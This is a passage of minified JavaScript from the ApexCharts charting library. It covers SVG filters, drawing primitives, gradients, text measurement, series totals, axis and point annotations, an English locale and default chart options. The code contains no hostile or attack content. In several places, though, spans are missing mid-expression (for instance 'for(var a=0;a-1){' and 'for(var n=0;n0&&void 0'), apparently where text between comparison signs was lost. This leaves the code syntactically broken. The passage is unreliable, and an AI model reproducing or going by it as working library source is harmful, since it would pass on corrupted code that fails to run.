".concat(u.globals.gridHeight)};(!t||t.indexOf("undefined")>-1||t.indexOf("NaN")>-1)&&(t=c()),(!r||r.indexOf("undefined")>-1||r.indexOf("NaN")>-1)&&(r=c()),u.globals.shouldAnimate||(o=1),e.plot(t).animate(1,u.globals.easing,s).plot(t).animate(o,u.globals.easing,s).plot(r).afterAll((function(){k.isNumber(n)?n===u.globals.series[u.globals.maxValsInArrayIndex].length-2&&u.globals.shouldAnimate&&l.animationCompleted(e):"none"!==i&&u.globals.shouldAnimate&&(!u.globals.comboCharts&&a===u.globals.series.length-1||u.globals.comboCharts)&&l.animationCompleted(e),l.showDelayedElements()}))}}]),e}(),x=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"getDefaultFilter",value:function(e,a){var n=this.w;e.unfilter(!0),(new window.SVG.Filter).size("120%","180%","-5%","-40%"),"none"!==n.config.states.normal.filter?this.applyFilter(e,a,n.config.states.normal.filter.type,n.config.states.normal.filter.value):n.config.chart.dropShadow.enabled&&this.dropShadow(e,n.config.chart.dropShadow,a)}},{key:"addNormalFilter",value:function(e,a){var n=this.w;n.config.chart.dropShadow.enabled&&!e.node.classList.contains("apexcharts-marker")&&this.dropShadow(e,n.config.chart.dropShadow,a)}},{key:"addLightenFilter",value:function(e,a,n){var i=this,t=this.w,r=n.intensity;e.unfilter(!0),new window.SVG.Filter,e.filter((function(e){var 
n=t.config.chart.dropShadow;(n.enabled?i.addShadow(e,a,n):e).componentTransfer({rgb:{type:"linear",slope:1.5,intercept:r}})})),e.filterer.node.setAttribute("filterUnits","userSpaceOnUse"),this._scaleFilterSize(e.filterer.node)}},{key:"addDarkenFilter",value:function(e,a,n){var i=this,t=this.w,r=n.intensity;e.unfilter(!0),new window.SVG.Filter,e.filter((function(e){var n=t.config.chart.dropShadow;(n.enabled?i.addShadow(e,a,n):e).componentTransfer({rgb:{type:"linear",slope:r}})})),e.filterer.node.setAttribute("filterUnits","userSpaceOnUse"),this._scaleFilterSize(e.filterer.node)}},{key:"applyFilter",value:function(e,a,n){var i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:.5;switch(n){case"none":this.addNormalFilter(e,a);break;case"lighten":this.addLightenFilter(e,a,{intensity:i});break;case"darken":this.addDarkenFilter(e,a,{intensity:i})}}},{key:"addShadow",value:function(e,a,n){var i=n.blur,t=n.top,r=n.left,o=n.color,s=n.opacity,l=e.flood(Array.isArray(o)?o[a]:o,s).composite(e.sourceAlpha,"in").offset(r,t).gaussianBlur(i).merge(e.source);return e.blend(e.source,l)}},{key:"dropShadow",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:0,i=a.top,t=a.left,r=a.blur,o=a.color,s=a.opacity,l=a.noUserSpaceOnUse,u=this.w;return e.unfilter(!0),k.isIE()&&"radialBar"===u.config.chart.type||(o=Array.isArray(o)?o[n]:o,e.filter((function(e){var a;a=k.isSafari()||k.isFirefox()||k.isIE()?e.flood(o,s).composite(e.sourceAlpha,"in").offset(t,i).gaussianBlur(r):e.flood(o,s).composite(e.sourceAlpha,"in").offset(t,i).gaussianBlur(r).merge(e.source),e.blend(e.source,a)})),l||e.filterer.node.setAttribute("filterUnits","userSpaceOnUse"),this._scaleFilterSize(e.filterer.node)),e}},{key:"setSelectionFilter",value:function(e,a,n){var i=this.w;if(void 0!==i.globals.selectedDataPoints[a]&&i.globals.selectedDataPoints[a].indexOf(n)>-1){e.node.setAttribute("selected",!0);var t=i.config.states.active.filter;"none"!==t&&this.applyFilter(e,a,t.type,t.value)}}},{key:"_scaleFilterSize",value:function(e){!function(a){for(var n in a)a.hasOwnProperty(n)&&e.setAttribute(n,a[n])}({width:"200%",height:"200%",x:"-50%",y:"-50%"})}}]),e}(),S=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"drawLine",value:function(e,a,n,i){var t=arguments.length>4&&void 0!==arguments[4]?arguments[4]:"#a8a8a8",r=arguments.length>5&&void 0!==arguments[5]?arguments[5]:0,o=arguments.length>6&&void 0!==arguments[6]?arguments[6]:null,s=arguments.length>7&&void 0!==arguments[7]?arguments[7]:"butt",l=this.w,u=l.globals.dom.Paper.line().attr({x1:e,y1:a,x2:n,y2:i,stroke:t,"stroke-dasharray":r,"stroke-width":o,"stroke-linecap":s});return u}},{key:"drawRect",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:0,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:0,t=arguments.length>4&&void 0!==arguments[4]?arguments[4]:0,r=arguments.length>5&&void 0!==arguments[5]?arguments[5]:"#fefefe",o=arguments.length>6&&void 0!==arguments[6]?arguments[6]:1,s=arguments.length>7&&void 0!==arguments[7]?arguments[7]:null,l=arguments.length>8&&void 0!==arguments[8]?arguments[8]:null,u=arguments.length>9&&void 0!==arguments[9]?arguments[9]:0,c=this.w,d=c.globals.dom.Paper.rect();return 
d.attr({x:e,y:a,width:n>0?n:0,height:i>0?i:0,rx:t,ry:t,opacity:o,"stroke-width":null!==s?s:0,stroke:null!==l?l:"none","stroke-dasharray":u}),d.node.setAttribute("fill",r),d}},{key:"drawPolygon",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"#e1e1e1",n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:1,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:"none",t=this.w,r=t.globals.dom.Paper.polygon(e).attr({fill:i,stroke:a,"stroke-width":n});return r}},{key:"drawCircle",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=this.w;e<0&&(e=0);var i=n.globals.dom.Paper.circle(2*e);return null!==a&&i.attr(a),i}},{key:"drawPath",value:function(e){var a=e.d,n=void 0===a?"":a,i=e.stroke,t=void 0===i?"#a8a8a8":i,r=e.strokeWidth,o=void 0===r?1:r,s=e.fill,l=e.fillOpacity,u=void 0===l?1:l,c=e.strokeOpacity,d=void 0===c?1:c,h=e.classes,p=e.strokeLinecap,m=void 0===p?null:p,f=e.strokeDashArray,v=void 0===f?0:f,g=this.w;return null===m&&(m=g.config.stroke.lineCap),(n.indexOf("undefined")>-1||n.indexOf("NaN")>-1)&&(n="M 0 ".concat(g.globals.gridHeight)),g.globals.dom.Paper.path(n).attr({fill:s,"fill-opacity":u,stroke:t,"stroke-opacity":d,"stroke-linecap":m,"stroke-width":o,"stroke-dasharray":v,class:h})}},{key:"group",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:null,a=this.w,n=a.globals.dom.Paper.group();return null!==e&&n.attr(e),n}},{key:"move",value:function(e,a){return["M",e,a].join(" ")}},{key:"line",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:null,i=null;return null===n?i=["L",e,a].join(" "):"H"===n?i=["H",e].join(" "):"V"===n&&(i=["V",a].join(" ")),i}},{key:"curve",value:function(e,a,n,i,t,r){return["C",e,a,n,i,t,r].join(" ")}},{key:"quadraticCurve",value:function(e,a,n,i){return["Q",e,a,n,i].join(" ")}},{key:"arc",value:function(e,a,n,i,t,r,o){var s=arguments.length>7&&void 0!==arguments[7]&&arguments[7],l="A";s&&(l="a");var u=[l,e,a,n,i,t,r,o].join(" ");return u}},{key:"renderPaths",value:function(e){var a,n=e.j,i=e.realIndex,t=e.pathFrom,o=e.pathTo,s=e.stroke,l=e.strokeWidth,u=e.strokeLinecap,c=e.fill,d=e.animationDelay,h=e.initialSpeed,p=e.dataChangeSpeed,m=e.className,f=e.shouldClipToGrid,v=void 0===f||f,g=e.bindEventsOnPaths,b=void 0===g||g,k=e.drawShadow,S=void 0===k||k,A=this.w,w=new x(this.ctx),M=new y(this.ctx),j=this.w.config.chart.animations.enabled,C=j&&this.w.config.chart.animations.dynamicAnimation.enabled,P=!!(j&&!A.globals.resized||C&&A.globals.dataChanged&&A.globals.shouldAnimate);P?a=t:(a=o,A.globals.animationEnded=!0);var B,T=A.config.stroke.dashArray;B=Array.isArray(T)?T[i]:A.config.stroke.dashArray;var L=this.drawPath({d:a,stroke:s,strokeWidth:l,fill:c,fillOpacity:1,classes:m,strokeLinecap:u,strokeDashArray:B});if(L.attr("index",i),v&&L.attr({"clip-path":"url(#gridRectMask".concat(A.globals.cuid,")")}),"none"!==A.config.states.normal.filter.type)w.getDefaultFilter(L,i);else if(A.config.chart.dropShadow.enabled&&S&&(!A.config.chart.dropShadow.enabledOnSeries||A.config.chart.dropShadow.enabledOnSeries&&-1!==A.config.chart.dropShadow.enabledOnSeries.indexOf(i))){var z=A.config.chart.dropShadow;w.dropShadow(L,z,i)}b&&(L.node.addEventListener("mouseenter",this.pathMouseEnter.bind(this,L)),L.node.addEventListener("mouseleave",this.pathMouseLeave.bind(this,L)),L.node.addEventListener("mousedown",this.pathMouseDown.bind(this,L))),L.attr({pathTo:o,pathFrom:t});var 
N={el:L,j:n,realIndex:i,pathFrom:t,pathTo:o,fill:c,strokeWidth:l,delay:d};return!j||A.globals.resized||A.globals.dataChanged?!A.globals.resized&&A.globals.dataChanged||M.showDelayedElements():M.animatePathsGradually(r(r({},N),{},{speed:h})),A.globals.dataChanged&&C&&P&&M.animatePathsGradually(r(r({},N),{},{speed:p})),L}},{key:"drawPattern",value:function(e,a,n){var i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:"#a8a8a8",t=arguments.length>4&&void 0!==arguments[4]?arguments[4]:0,r=this.w,o=r.globals.dom.Paper.pattern(a,n,(function(r){"horizontalLines"===e?r.line(0,0,n,0).stroke({color:i,width:t+1}):"verticalLines"===e?r.line(0,0,0,a).stroke({color:i,width:t+1}):"slantedLines"===e?r.line(0,0,a,n).stroke({color:i,width:t}):"squares"===e?r.rect(a,n).fill("none").stroke({color:i,width:t}):"circles"===e&&r.circle(a).fill("none").stroke({color:i,width:t})}));return o}},{key:"drawGradient",value:function(e,a,n,i,t){var r,o=arguments.length>5&&void 0!==arguments[5]?arguments[5]:null,s=arguments.length>6&&void 0!==arguments[6]?arguments[6]:null,l=arguments.length>7&&void 0!==arguments[7]?arguments[7]:null,u=arguments.length>8&&void 0!==arguments[8]?arguments[8]:0,c=this.w;a.length<9&&0===a.indexOf("#")&&(a=k.hexToRgba(a,i)),n.length<9&&0===n.indexOf("#")&&(n=k.hexToRgba(n,t));var d=0,h=1,p=1,m=null;null!==s&&(d=void 0!==s[0]?s[0]/100:0,h=void 0!==s[1]?s[1]/100:1,p=void 0!==s[2]?s[2]/100:1,m=void 0!==s[3]?s[3]/100:null);var f=!("donut"!==c.config.chart.type&&"pie"!==c.config.chart.type&&"polarArea"!==c.config.chart.type&&"bubble"!==c.config.chart.type);if(r=null===l||0===l.length?c.globals.dom.Paper.gradient(f?"radial":"linear",(function(e){e.at(d,a,i),e.at(h,n,t),e.at(p,n,t),null!==m&&e.at(m,a,i)})):c.globals.dom.Paper.gradient(f?"radial":"linear",(function(e){(Array.isArray(l[u])?l[u]:l).forEach((function(a){e.at(a.offset/100,a.color,a.opacity)}))})),f){var v=c.globals.gridWidth/2,g=c.globals.gridHeight/2;"bubble"!==c.config.chart.type?r.attr({gradientUnits:"userSpaceOnUse",cx:v,cy:g,r:o}):r.attr({cx:.5,cy:.5,r:.8,fx:.2,fy:.2})}else"vertical"===e?r.from(0,0).to(0,1):"diagonal"===e?r.from(0,0).to(1,1):"horizontal"===e?r.from(0,1).to(1,1):"diagonal2"===e&&r.from(1,0).to(0,1);return r}},{key:"drawText",value:function(e){var a,n=e.x,i=e.y,t=e.text,r=e.textAnchor,o=e.fontSize,s=e.fontFamily,l=e.fontWeight,u=e.foreColor,c=e.opacity,d=e.cssClass,h=void 0===d?"":d,p=e.isPlainText,m=void 0===p||p,f=this.w;return void 0===t&&(t=""),r||(r="start"),u&&u.length||(u=f.config.chart.foreColor),s=s||f.config.chart.fontFamily,l=l||"regular",(a=Array.isArray(t)?f.globals.dom.Paper.text((function(e){for(var a=0;a-1){var s=n.globals.selectedDataPoints[t].indexOf(r);n.globals.selectedDataPoints[t].splice(s,1)}}else{if(!n.config.states.active.allowMultipleDataPointsSelection&&n.globals.selectedDataPoints.length>0){n.globals.selectedDataPoints=[];var l=n.globals.dom.Paper.select(".apexcharts-series path").members,u=n.globals.dom.Paper.select(".apexcharts-series circle, .apexcharts-series rect").members,c=function(e){Array.prototype.forEach.call(e,(function(e){e.node.setAttribute("selected","false"),i.getDefaultFilter(e,t)}))};c(l),c(u)}e.node.setAttribute("selected","true"),o="true",void 0===n.globals.selectedDataPoints[t]&&(n.globals.selectedDataPoints[t]=[]),n.globals.selectedDataPoints[t].push(r)}if("true"===o){var d=n.config.states.active.filter;"none"!==d&&i.applyFilter(e,t,d.type,d.value)}else"none"!==n.config.states.active.filter.type&&i.getDefaultFilter(e,t);"function"==typeof 
n.config.chart.events.dataPointSelection&&n.config.chart.events.dataPointSelection(a,this.ctx,{selectedDataPoints:n.globals.selectedDataPoints,seriesIndex:t,dataPointIndex:r,w:n}),a&&this.ctx.events.fireEvent("dataPointSelection",[a,this.ctx,{selectedDataPoints:n.globals.selectedDataPoints,seriesIndex:t,dataPointIndex:r,w:n}])}},{key:"rotateAroundCenter",value:function(e){var a={};return e&&"function"==typeof e.getBBox&&(a=e.getBBox()),{x:a.x+a.width/2,y:a.y+a.height/2}}},{key:"getTextRects",value:function(e,a,n,i){var t=!(arguments.length>4&&void 0!==arguments[4])||arguments[4],r=this.w,o=this.drawText({x:-200,y:-200,text:e,textAnchor:"start",fontSize:a,fontFamily:n,foreColor:"#fff",opacity:0});i&&o.attr("transform",i),r.globals.dom.Paper.add(o);var s=o.bbox();return t||(s=o.node.getBoundingClientRect()),o.remove(),{width:s.width,height:s.height}}},{key:"placeTextWithEllipsis",value:function(e,a,n){if("function"==typeof e.getComputedTextLength&&(e.textContent=a,a.length>0&&e.getComputedTextLength()>=n/1.1)){for(var i=a.length-3;i>0;i-=3)if(e.getSubStringLength(0,i)<=n/1.1)return void(e.textContent=a.substring(0,i)+"...");e.textContent="."}}}],[{key:"setAttrs",value:function(e,a){for(var n in a)a.hasOwnProperty(n)&&e.setAttribute(n,a[n])}}]),e}(),A=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"getStackedSeriesTotals",value:function(){var e=this.w,a=[];if(0===e.globals.series.length)return a;for(var n=0;n0&&void 0!==arguments[0]?arguments[0]:null;return null===e?this.w.config.series.reduce((function(e,a){return e+a}),0):this.w.globals.series[e].reduce((function(e,a){return e+a}),0)}},{key:"isSeriesNull",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:null;return 0===(null===e?this.w.config.series.filter((function(e){return null!==e})):this.w.config.series[e].data.filter((function(e){return null!==e}))).length}},{key:"seriesHaveSameValues",value:function(e){return this.w.globals.series[e].every((function(e,a,n){return e===n[0]}))}},{key:"getCategoryLabels",value:function(e){var a=this.w,n=e.slice();return a.config.xaxis.convertedCatToNumeric&&(n=e.map((function(e,n){return a.config.xaxis.labels.formatter(e-a.globals.minX+1)}))),n}},{key:"getLargestSeries",value:function(){var e=this.w;e.globals.maxValsInArrayIndex=e.globals.series.map((function(e){return e.length})).indexOf(Math.max.apply(Math,e.globals.series.map((function(e){return e.length}))))}},{key:"getLargestMarkerSize",value:function(){var e=this.w,a=0;return e.globals.markers.size.forEach((function(e){a=Math.max(a,e)})),e.config.markers.discrete&&e.config.markers.discrete.length&&e.config.markers.discrete.forEach((function(e){a=Math.max(a,e.size)})),a>0&&(a+=e.config.markers.hover.sizeOffset+1),e.globals.markers.largestSize=a,a}},{key:"getSeriesTotals",value:function(){var e=this.w;e.globals.seriesTotals=e.globals.series.map((function(e,a){var n=0;if(Array.isArray(e))for(var i=0;ie&&n.globals.seriesX[t][o]0&&(a=!0),{comboBarCount:n,comboCharts:a}}},{key:"extendArrayProps",value:function(e,a,n){return a.yaxis&&(a=e.extendYAxis(a,n)),a.annotations&&(a.annotations.yaxis&&(a=e.extendYAxisAnnotations(a)),a.annotations.xaxis&&(a=e.extendXAxisAnnotations(a)),a.annotations.points&&(a=e.extendPointAnnotations(a))),a}}]),e}(),w=function(){function e(a){s(this,e),this.w=a.w,this.annoCtx=a}return u(e,[{key:"setOrientations",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=this.w;if("vertical"===e.label.orientation){var 
i=null!==a?a:0,t=n.globals.dom.baseEl.querySelector(".apexcharts-xaxis-annotations .apexcharts-xaxis-annotation-label[rel='".concat(i,"']"));if(null!==t){var r=t.getBoundingClientRect();t.setAttribute("x",parseFloat(t.getAttribute("x"))-r.height+4),"top"===e.label.position?t.setAttribute("y",parseFloat(t.getAttribute("y"))+r.width):t.setAttribute("y",parseFloat(t.getAttribute("y"))-r.width);var o=this.annoCtx.graphics.rotateAroundCenter(t),s=o.x,l=o.y;t.setAttribute("transform","rotate(-90 ".concat(s," ").concat(l,")"))}}}},{key:"addBackgroundToAnno",value:function(e,a){var n=this.w;if(!e||void 0===a.label.text||void 0!==a.label.text&&!String(a.label.text).trim())return null;var i=n.globals.dom.baseEl.querySelector(".apexcharts-grid").getBoundingClientRect(),t=e.getBoundingClientRect(),r=a.label.style.padding.left,o=a.label.style.padding.right,s=a.label.style.padding.top,l=a.label.style.padding.bottom;"vertical"===a.label.orientation&&(s=a.label.style.padding.left,l=a.label.style.padding.right,r=a.label.style.padding.top,o=a.label.style.padding.bottom);var u=t.left-i.left-r,c=t.top-i.top-s,d=this.annoCtx.graphics.drawRect(u-n.globals.barPadForNumericAxis,c,t.width+r+o,t.height+s+l,a.label.borderRadius,a.label.style.background,1,a.label.borderWidth,a.label.borderColor,0);return a.id&&d.node.classList.add(a.id),d}},{key:"annotationsBackground",value:function(){var e=this,a=this.w,n=function(n,i,t){var r=a.globals.dom.baseEl.querySelector(".apexcharts-".concat(t,"-annotations .apexcharts-").concat(t,"-annotation-label[rel='").concat(i,"']"));if(r){var o=r.parentNode,s=e.addBackgroundToAnno(r,n);s&&(o.insertBefore(s.node,r),n.label.mouseEnter&&s.node.addEventListener("mouseenter",n.label.mouseEnter.bind(e,n)),n.label.mouseLeave&&s.node.addEventListener("mouseleave",n.label.mouseLeave.bind(e,n)))}};a.config.annotations.xaxis.map((function(e,a){n(e,a,"xaxis")})),a.config.annotations.yaxis.map((function(e,a){n(e,a,"yaxis")})),a.config.annotations.points.map((function(e,a){n(e,a,"point")}))}},{key:"getY1Y2",value:function(e,a){var n,i="y1"===e?a.y:a.y2,t=this.w;if(this.annoCtx.invertAxis){var r=t.globals.labels.indexOf(i);t.config.xaxis.convertedCatToNumeric&&(r=t.globals.categoryLabels.indexOf(i));var o=t.globals.dom.baseEl.querySelector(".apexcharts-yaxis-texts-g text:nth-child("+(r+1)+")");o&&(n=parseFloat(o.getAttribute("y")))}else{var s;s=t.config.yaxis[a.yAxisIndex].logarithmic?(i=new A(this.annoCtx.ctx).getLogVal(i,a.yAxisIndex))/t.globals.yLogRatio[a.yAxisIndex]:(i-t.globals.minYArr[a.yAxisIndex])/(t.globals.yRange[a.yAxisIndex]/t.globals.gridHeight),n=t.globals.gridHeight-s,t.config.yaxis[a.yAxisIndex]&&t.config.yaxis[a.yAxisIndex].reversed&&(n=s)}return n}},{key:"getX1X2",value:function(e,a){var n=this.w,i=this.annoCtx.invertAxis?n.globals.minY:n.globals.minX,t=this.annoCtx.invertAxis?n.globals.maxY:n.globals.maxX,r=this.annoCtx.invertAxis?n.globals.yRange[0]:n.globals.xRange,o=(a.x-i)/(r/n.globals.gridWidth);this.annoCtx.inversedReversedAxis&&(o=(t-a.x)/(r/n.globals.gridWidth)),"category"!==n.config.xaxis.type&&!n.config.xaxis.convertedCatToNumeric||this.annoCtx.invertAxis||n.globals.dataFormatXNumeric||(o=this.getStringX(a.x));var s=(a.x2-i)/(r/n.globals.gridWidth);return this.annoCtx.inversedReversedAxis&&(s=(t-a.x2)/(r/n.globals.gridWidth)),"category"!==n.config.xaxis.type&&!n.config.xaxis.convertedCatToNumeric||this.annoCtx.invertAxis||n.globals.dataFormatXNumeric||(s=this.getStringX(a.x2)),"x1"===e?o:s}},{key:"getStringX",value:function(e){var 
a=this.w,n=e;a.config.xaxis.convertedCatToNumeric&&a.globals.categoryLabels.length&&(e=a.globals.categoryLabels.indexOf(e)+1);var i=a.globals.labels.indexOf(e),t=a.globals.dom.baseEl.querySelector(".apexcharts-xaxis-texts-g text:nth-child("+(i+1)+")");return t&&(n=parseFloat(t.getAttribute("x"))),n}}]),e}(),M=function(){function e(a){s(this,e),this.w=a.w,this.annoCtx=a,this.invertAxis=this.annoCtx.invertAxis,this.helpers=new w(this.annoCtx)}return u(e,[{key:"addXaxisAnnotation",value:function(e,a,n){var i,t=this.w,r=this.helpers.getX1X2("x1",e),o=e.label.text,s=e.strokeDashArray;if(k.isNumber(r)){if(null===e.x2||void 0===e.x2){var l=this.annoCtx.graphics.drawLine(r+e.offsetX,0+e.offsetY,r+e.offsetX,t.globals.gridHeight+e.offsetY,e.borderColor,s,e.borderWidth);a.appendChild(l.node),e.id&&l.node.classList.add(e.id)}else{if((i=this.helpers.getX1X2("x2",e))o){var u=o;o=i,i=u}var c=this.annoCtx.graphics.drawRect(0+e.offsetX,i+e.offsetY,this._getYAxisAnnotationWidth(e),o-i,0,e.fillColor,e.opacity,1,e.borderColor,r);c.node.classList.add("apexcharts-annotation-rect"),c.attr("clip-path","url(#gridRectMask".concat(t.globals.cuid,")")),a.appendChild(c.node),e.id&&c.node.classList.add(e.id)}var d="right"===e.label.position?t.globals.gridWidth:0,h=this.annoCtx.graphics.drawText({x:d+e.label.offsetX,y:(null!=i?i:o)+e.label.offsetY-3,text:s,textAnchor:e.label.textAnchor,fontSize:e.label.style.fontSize,fontFamily:e.label.style.fontFamily,fontWeight:e.label.style.fontWeight,foreColor:e.label.style.color,cssClass:"apexcharts-yaxis-annotation-label ".concat(e.label.style.cssClass," ").concat(e.id?e.id:"")});h.attr({rel:n}),a.appendChild(h.node)}},{key:"_getYAxisAnnotationWidth",value:function(e){var a=this.w;return a.globals.gridWidth,(e.width.indexOf("%")>-1?a.globals.gridWidth*parseInt(e.width,10)/100:parseInt(e.width,10))+e.offsetX}},{key:"drawYAxisAnnotations",value:function(){var e=this,a=this.w,n=this.annoCtx.graphics.group({class:"apexcharts-yaxis-annotations"});return a.config.annotations.yaxis.map((function(a,i){e.addYaxisAnnotation(a,n.node,i)})),n}}]),e}(),C=function(){function e(a){s(this,e),this.w=a.w,this.annoCtx=a,this.helpers=new w(this.annoCtx)}return u(e,[{key:"addPointAnnotation",value:function(e,a,n){this.w;var i=this.helpers.getX1X2("x1",e),t=this.helpers.getY1Y2("y1",e);if(k.isNumber(i)){var r={pSize:e.marker.size,pointStrokeWidth:e.marker.strokeWidth,pointFillColor:e.marker.fillColor,pointStrokeColor:e.marker.strokeColor,shape:e.marker.shape,pRadius:e.marker.radius,class:"apexcharts-point-annotation-marker ".concat(e.marker.cssClass," ").concat(e.id?e.id:"")},o=this.annoCtx.graphics.drawMarker(i+e.marker.offsetX,t+e.marker.offsetY,r);a.appendChild(o.node);var s=e.label.text?e.label.text:"",l=this.annoCtx.graphics.drawText({x:i+e.label.offsetX,y:t+e.label.offsetY-e.marker.size-parseFloat(e.label.style.fontSize)/1.6,text:s,textAnchor:e.label.textAnchor,fontSize:e.label.style.fontSize,fontFamily:e.label.style.fontFamily,fontWeight:e.label.style.fontWeight,foreColor:e.label.style.color,cssClass:"apexcharts-point-annotation-label ".concat(e.label.style.cssClass," ").concat(e.id?e.id:"")});if(l.attr({rel:n}),a.appendChild(l.node),e.customSVG.SVG){var u=this.annoCtx.graphics.group({class:"apexcharts-point-annotations-custom-svg "+e.customSVG.cssClass});u.attr({transform:"translate(".concat(i+e.customSVG.offsetX,", ").concat(t+e.customSVG.offsetY,")")}),u.node.innerHTML=e.customSVG.SVG,a.appendChild(u.node)}if(e.image.path){var 
c=e.image.width?e.image.width:20,d=e.image.height?e.image.height:20;o=this.annoCtx.addImage({x:i+e.image.offsetX-c/2,y:t+e.image.offsetY-d/2,width:c,height:d,path:e.image.path,appendTo:".apexcharts-point-annotations"})}e.mouseEnter&&o.node.addEventListener("mouseenter",e.mouseEnter.bind(this,e)),e.mouseLeave&&o.node.addEventListener("mouseleave",e.mouseLeave.bind(this,e))}}},{key:"drawPointAnnotations",value:function(){var e=this,a=this.w,n=this.annoCtx.graphics.group({class:"apexcharts-point-annotations"});return a.config.annotations.points.map((function(a,i){e.addPointAnnotation(a,n.node,i)})),n}}]),e}(),P={name:"en",options:{months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],days:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],shortDays:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],toolbar:{exportToSVG:"Download SVG",exportToPNG:"Download PNG",exportToCSV:"Download CSV",menu:"Menu",selection:"Selection",selectionZoom:"Selection Zoom",zoomIn:"Zoom In",zoomOut:"Zoom Out",pan:"Panning",reset:"Reset Zoom"}}},B=function(){function e(){s(this,e),this.yAxis={show:!0,showAlways:!1,showForNullSeries:!0,seriesName:void 0,opposite:!1,reversed:!1,logarithmic:!1,logBase:10,tickAmount:void 0,forceNiceScale:!1,max:void 0,min:void 0,floating:!1,decimalsInFloat:void 0,labels:{show:!0,minWidth:0,maxWidth:160,offsetX:0,offsetY:0,align:void 0,rotate:0,padding:20,style:{colors:[],fontSize:"11px",fontWeight:400,fontFamily:void 0,cssClass:""},formatter:void 0},axisBorder:{show:!1,color:"#e0e0e0",width:1,offsetX:0,offsetY:0},axisTicks:{show:!1,color:"#e0e0e0",width:6,offsetX:0,offsetY:0},title:{text:void 0,rotate:-90,offsetY:0,offsetX:0,style:{color:void 0,fontSize:"11px",fontWeight:900,fontFamily:void 0,cssClass:""}},tooltip:{enabled:!1,offsetX:0},crosshairs:{show:!0,position:"front",stroke:{color:"#b6b6b6",width:1,dashArray:0}}},this.pointAnnotation={id:void 0,x:0,y:null,yAxisIndex:0,seriesIndex:0,mouseEnter:void 0,mouseLeave:void 0,marker:{size:4,fillColor:"#fff",strokeWidth:2,strokeColor:"#333",shape:"circle",offsetX:0,offsetY:0,radius:2,cssClass:""},label:{borderColor:"#c2c2c2",borderWidth:1,borderRadius:2,text:void 0,textAnchor:"middle",offsetX:0,offsetY:0,mouseEnter:void 0,mouseLeave:void 0,style:{background:"#fff",color:void 0,fontSize:"11px",fontFamily:void 0,fontWeight:400,cssClass:"",padding:{left:5,right:5,top:2,bottom:2}}},customSVG:{SVG:void 0,cssClass:void 0,offsetX:0,offsetY:0},image:{path:void 0,width:20,height:20,offsetX:0,offsetY:0}},this.yAxisAnnotation={id:void 0,y:0,y2:null,strokeDashArray:1,fillColor:"#c2c2c2",borderColor:"#c2c2c2",borderWidth:1,opacity:.3,offsetX:0,offsetY:0,width:"100%",yAxisIndex:0,label:{borderColor:"#c2c2c2",borderWidth:1,borderRadius:2,text:void 0,textAnchor:"end",position:"right",offsetX:0,offsetY:-3,mouseEnter:void 0,mouseLeave:void 0,style:{background:"#fff",color:void 0,fontSize:"11px",fontFamily:void 0,fontWeight:400,cssClass:"",padding:{left:5,right:5,top:2,bottom:2}}}},this.xAxisAnnotation={id:void 0,x:0,x2:null,strokeDashArray:1,fillColor:"#c2c2c2",borderColor:"#c2c2c2",borderWidth:1,opacity:.3,offsetX:0,offsetY:0,label:{borderColor:"#c2c2c2",borderWidth:1,borderRadius:2,text:void 0,textAnchor:"middle",orientation:"vertical",position:"top",offsetX:0,offsetY:0,mouseEnter:void 0,mouseLeave:void 0,style:{background:"#fff",color:void 0,fontSize:"11px",fontFamily:void 
0,fontWeight:400,cssClass:"",padding:{left:5,right:5,top:2,bottom:2}}}},this.text={x:0,y:0,text:"",textAnchor:"start",foreColor:void 0,fontSize:"13px",fontFamily:void 0,fontWeight:400,appendTo:".apexcharts-annotations",backgroundColor:"transparent",borderColor:"#c2c2c2",borderRadius:0,borderWidth:0,paddingLeft:4,paddingRight:4,paddingTop:2,paddingBottom:2}}return u(e,[{key:"init",value:function(){return{annotations:{position:"front",yaxis:[this.yAxisAnnotation],xaxis:[this.xAxisAnnotation],points:[this.pointAnnotation],texts:[],images:[],shapes:[]},chart:{animations:{enabled:!0,easing:"easeinout",speed:800,animateGradually:{delay:150,enabled:!0},dynamicAnimation:{enabled:!0,speed:350}},background:"transparent",locales:[P],defaultLocale:"en",dropShadow:{enabled:!1,enabledOnSeries:void 0,top:2,left:2,blur:4,color:"#000",opacity:.35},events:{animationEnd:void 0,beforeMount:void 0,mounted:void 0,updated:void 0,click:void 0,mouseMove:void 0,mouseLeave:void 0,legendClick:void 0,markerClick:void 0,selection:void 0,dataPointSelection:void 0,dataPointMouseEnter:void 0,dataPointMouseLeave:void 0,beforeZoom:void 0,beforeResetZoom:void 0,zoomed:void 0,scrolled:void 0,brushScrolled:void 0},foreColor:"#373d3f",fontFamily:"Helvetica, Arial, sans-serif",height:"auto",parentHeightOffset:15,redrawOnParentResize:!0,redrawOnWindowResize:!0,id:void 0,group:void 0,offsetX:0,offsetY:0,selection:{enabled:!1,type:"x",fill:{color:"#24292e",opacity:.1},stroke:{width:1,color:"#24292e",opacity:.4,dashArray:3},xaxis:{min:void 0,max:void 0},yaxis:{min:void 0,max:void 0}},sparkline:{enabled:!1},brush:{enabled:!1,autoScaleYaxis:!0,target:void 